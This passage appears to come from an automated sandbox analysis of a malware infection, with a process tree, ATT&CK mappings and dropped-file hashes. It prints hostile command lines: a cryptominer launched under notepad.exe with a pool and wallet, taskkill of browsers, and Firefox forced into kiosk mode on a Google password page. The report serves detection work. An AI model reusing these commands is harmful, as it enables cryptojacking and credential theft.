        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3352
        
        C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:388
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:1052
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        9⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3168
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4da8b1-1917-48f8-8471-c9d4026ec0ea} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" gpu
        10⤵
        
        PID:2616
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a83a43-be66-4ac1-b59d-ee0f9412b728} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" socket
        10⤵
        
        PID:1864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3196 -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5316dc-602e-4628-b280-8aaf8196ae20} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
        10⤵
        
        PID:1880
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 32900 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0c3d3f6-51aa-4537-b6ae-6c478898c3e0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
        10⤵
        
        PID:3352
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4764 -prefsLen 32932 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18f7a36f-15c3-43fd-9335-6c8ad02b5c0b} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" utility
        10⤵
        Checks processor information in registry
        
        PID:5216
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -childID 3 -isForBrowser -prefsHandle 4944 -prefMapHandle 4956 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dab1ff2-857a-452f-8cf6-47ea9cfc5996} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
        10⤵
        
        PID:5280
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 4 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8faeb7e1-521b-46fe-baeb-4c27939b5db0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
        10⤵
        
        PID:5672
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5316 -childID 5 -isForBrowser -prefsHandle 5304 -prefMapHandle 5252 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48cc90ae-2856-44bc-9aff-ffdad01804bc} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab
        10⤵
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"
        7⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"
        7⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"
        7⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"
        7⤵
        
        PID:5640
- C:\Windows\System32\notepad.exe
  --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4384
- C:\Windows\system32\tasklist.exe
  tasklist /FI "PID eq 4384"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2264
- C:\Windows\system32\tasklist.exe
  tasklist /FI "PID eq 4384"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:3080
- C:\Windows\system32\tasklist.exe
  tasklist /FI "PID eq 4384"
  2⤵
  - Enumerates processes with tasklist
  PID:5956
- C:\Windows\system32\tasklist.exe
  tasklist /FI "PID eq 4384"
  2⤵
  - Enumerates processes with tasklist
  PID:5604

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4408

C:\ProgramData\gmwu\wtrpqgw.exe
C:\ProgramData\gmwu\wtrpqgw.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3836 -ip 3836
1⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
1⤵
PID:5668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\72B093CA62FBDFDF.dat

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7CPZATFC\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EEUCUS8F\soft[1]

Filesize
987KB

MD5
f49d1aaae28b92052e997480c504aa3b

SHA1
a422f6403847405cee6068f3394bb151d8591fb5

SHA256
81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

SHA512
41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
1f85371e72951bbc67cd29808d0076dd

SHA1
2f3636bada3d08517e52b29525d065d6dae6cbfa

SHA256
112cbfeacdd2efb5ef37388d58009f147c4b9f3dd7dbef620b95437f5c0ecf14

SHA512
8a6b237875cb3ab5d1eda5870e276e6e3011b232d4962242581ca5d4946ce1e0d0576e62d019016aaacde13f3a3d4772b698ec3de2371e22be5c6edb5652a714

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

Filesize
13KB

MD5
d176c8de49b621a746acd1e113f81b0b

SHA1
38a90a32b2b131e52a08a75543faae98872480be

SHA256
357332277d1b6c8507dd937e50f5035c80b464d029598a4be632919c039df171

SHA512
c5f53252844ccaec5ecc39573c10538d327fee4beeedb30660789873172022c13aa7c7859832b391cae7f192a63571cf8e0b90d22b97cbcfba4691d28a6a75cf

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

Filesize
13KB

MD5
6634e045ea77c37dde6391b4498eee78

SHA1
fa57d63bfc6565a985f894fbaacee45e1652062d

SHA256
01016ee7a7abcd878e0aada10300bd6ca2323c5a31efd6583f7211abb2116463

SHA512
5bb515b22347e3abae5286a549c74e48c7d5eaa2426193b82ad83d2bc70271bbc972d147703d549acd3c40da61e8f050ff34c07dbd2b0166aea9446c359c4803

Download Submit
C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE

Filesize
1.8MB

MD5
b5db83c03a37b4cd4746a6080133e338

SHA1
edf3f7e5c3bda89e1382df8f7d0443783426c834

SHA256
8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df

SHA512
e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

Download Submit
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe

Filesize
11.5MB

MD5
9da08b49cdcc4a84b4a722d1006c2af8

SHA1
7b5af0630b89bd2a19ae32aea30343330ca3a9eb

SHA256
215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

SHA512
579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

Filesize
48KB

MD5
d39df45e0030e02f7e5035386244a523

SHA1
9ae72545a0b6004cdab34f56031dc1c8aa146cc9

SHA256
df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

SHA512
69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

Download Submit
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

Filesize
120KB

MD5
5b3ed060facb9d57d8d0539084686870

SHA1
9cae8c44e44605d02902c29519ea4700b4906c76

SHA256
7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207

SHA512
6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

Filesize
457KB

MD5
73636685f823d103c54b30bc457c7f0d

SHA1
597dba03dce00cf6d30b082c80c8f9108ae90ccf

SHA256
1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c

SHA512
183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

Filesize
38KB

MD5
47177b7fbf1ce282fb87da80fd264b3f

SHA1
d07d2f9624404fa882eb94ee108f222d76bbbd4c

SHA256
e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb

SHA512
059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe

Filesize
938KB

MD5
83cd4a3ac24bea5dd2388d852288c7de

SHA1
059245d06571b62c82b059a16b046793f6753dbc

SHA256
a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1

SHA512
5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

Filesize
1KB

MD5
cedac8d9ac1fbd8d4cfc76ebe20d37f9

SHA1
b0db8b540841091f32a91fd8b7abcd81d9632802

SHA256
5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

SHA512
ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe

Filesize
3.7MB

MD5
d054bcb257edeee50293394229ab1c67

SHA1
80f84013bdc91aa820a0534a297be285e9f0c9f8

SHA256
b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e

SHA512
ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe

Filesize
445KB

MD5
c83ea72877981be2d651f27b0b56efec

SHA1
8d79c3cd3d04165b5cd5c43d6f628359940709a7

SHA256
13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

SHA512
d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe

Filesize
4.5MB

MD5
5d153f73ce1b6a907cf87ddb04ba12b2

SHA1
bfda9ee8501ae0ca60f8e1803efea482085bf699

SHA256
2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c

SHA512
0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe

Filesize
1.8MB

MD5
8538c195a09066478922511ea1a02edf

SHA1
15e8910df845d897b4bb163caef4c6112570855b

SHA256
d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96

SHA512
60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe

Filesize
3.1MB

MD5
2a48e7b047c5ff096c6dce52d4f26dbb

SHA1
e0d61e10b27131b1c34ade44d1a2117afd2cf099

SHA256
42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d

SHA512
75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe

Filesize
1.7MB

MD5
338a31056b3b81d48a292a7bf9af67c7

SHA1
f5061e3583ba604b25e316f12fc58f40238d44b4

SHA256
cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea

SHA512
5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe

Filesize
946KB

MD5
c0caf5a901b162b6792eab9697827b5d

SHA1
d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84

SHA256
28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f

SHA512
3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe

Filesize
1.7MB

MD5
8043b20e32ff2f0c75e9a3eed0c4bf07

SHA1
5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3

SHA256
69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e

SHA512
35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

Filesize
6.8MB

MD5
dab2bc3868e73dd0aab2a5b4853d9583

SHA1
3dadfc676570fc26fc2406d948f7a6d4834a6e2c

SHA256
388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

SHA512
3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

Filesize
1.8MB

MD5
f155a51c9042254e5e3d7734cd1c3ab0

SHA1
9d6da9f8155b47bdba186be81fb5e9f3fae00ccf

SHA256
560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

SHA512
67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\Crypto\Util\_strxor.pyd

Filesize
10KB

MD5
f24f9356a6bdd29b9ef67509a8bc3a96

SHA1
a26946e938304b4e993872c6721eb8cc1dcbe43b

SHA256
034bb8efe3068763d32c404c178bd88099192c707a36f5351f7fdb63249c7f81

SHA512
c4d3f92d7558be1a714388c72f5992165dd7a9e1b4fa83b882536030542d93fdad9148c981f76fff7868192b301ac9256edb8c3d5ce5a1a2acac183f96c1028b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
64KB

MD5
a25bc2b21b555293554d7f611eaa75ea

SHA1
a0dfd4fcfae5b94d4471357f60569b0c18b30c17

SHA256
43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d

SHA512
b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

Filesize
292KB

MD5
50ea156b773e8803f6c1fe712f746cba

SHA1
2c68212e96605210eddf740291862bdf59398aef

SHA256
94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

SHA512
01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd

Filesize
122KB

MD5
d8f690eae02332a6898e9c8b983c56dd

SHA1
112c1fe25e0d948f767e02f291801c0e4ae592f0

SHA256
c6bb8cad80b8d7847c52931f11d73ba64f78615218398b2c058f9b218ff21ca9

SHA512
e732f79f39ba9721cc59dbe8c4785ffd74df84ca00d13d72afa3f96b97b8c7adf4ea9344d79ee2a1c77d58ef28d3ddcc855f3cb13edda928c17b1158abcc5b4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
774KB

MD5
4ff168aaa6a1d68e7957175c8513f3a2

SHA1
782f886709febc8c7cebcec4d92c66c4d5dbcf57

SHA256
2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

SHA512
c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fd4qigvq.hxy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta

Filesize
717B

MD5
1815cd447c99ad9a8e0904b8adbd6ae0

SHA1
9cc9180e2c1e60d7713c4afda62c55483d21e630

SHA256
0b3791dbaa23bcdba8f9b17397e72928cc35a55123d0ec2c112ed3ae1fecc2fc

SHA512
8000d5546a5d859a0dad1ab5f348f8bd83e3bfb6427fc294cfb7628ffd567aabec5c8f0b8d502d586b55e734b686bd141acc6c8ee6dbd2d69e8c550eac94f785

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_cbc.pyd

Filesize
12KB

MD5
40390f2113dc2a9d6cfae7127f6ba329

SHA1
9c886c33a20b3f76b37aa9b10a6954f3c8981772

SHA256
6ba9c910f755885e4d356c798a4dd32d2803ea4cfabb3d56165b3017d0491ae2

SHA512
617b963816838d649c212c5021d7d0c58839a85d4d33bbaf72c0ec6ecd98b609080e9e57af06fa558ff302660619be57cc974282826ab9f21ae0d80fbaa831a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_cfb.pyd

Filesize
12KB

MD5
899895c0ed6830c4c9a3328cc7df95b6

SHA1
c02f14ebda8b631195068266ba20e03210abeabc

SHA256
18d568c7be3e04f4e6026d12b09b1fa3fae50ff29ac3deaf861f3c181653e691

SHA512
0b4c50e40af92bc9589668e13df417244274f46f5a66e1fc7d1d59bc281969ba319305becea119385f01cc4603439e4b37afa2cf90645425210848a02839e3e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_ctr.pyd

Filesize
14KB

MD5
c4c525b081f8a0927091178f5f2ee103

SHA1
a1f17b5ea430ade174d02ecc0b3cb79dbf619900

SHA256
4d86a90b2e20cde099d6122c49a72bae081f60eb2eea0f76e740be6c41da6749

SHA512
7c06e3e6261427bc6e654b2b53518c7eaa5f860a47ae8e80dc3f8f0fed91e122cb2d4632188dc44123fb759749b5425f426cd1153a8f84485ef0491002b26555

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_ecb.pyd

Filesize
10KB

MD5
80bb1e0e06acaf03a0b1d4ef30d14be7

SHA1
b20cac0d2f3cd803d98a2e8a25fbf65884b0b619

SHA256
5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6

SHA512
2a13ab6715b818ad62267ab51e55cd54714aebf21ec9ea61c2aefd56017dc84a6b360d024f8682a2e105582b9c5fe892ecebd2bef8a492279b19ffd84bc83fa5

Download Submit
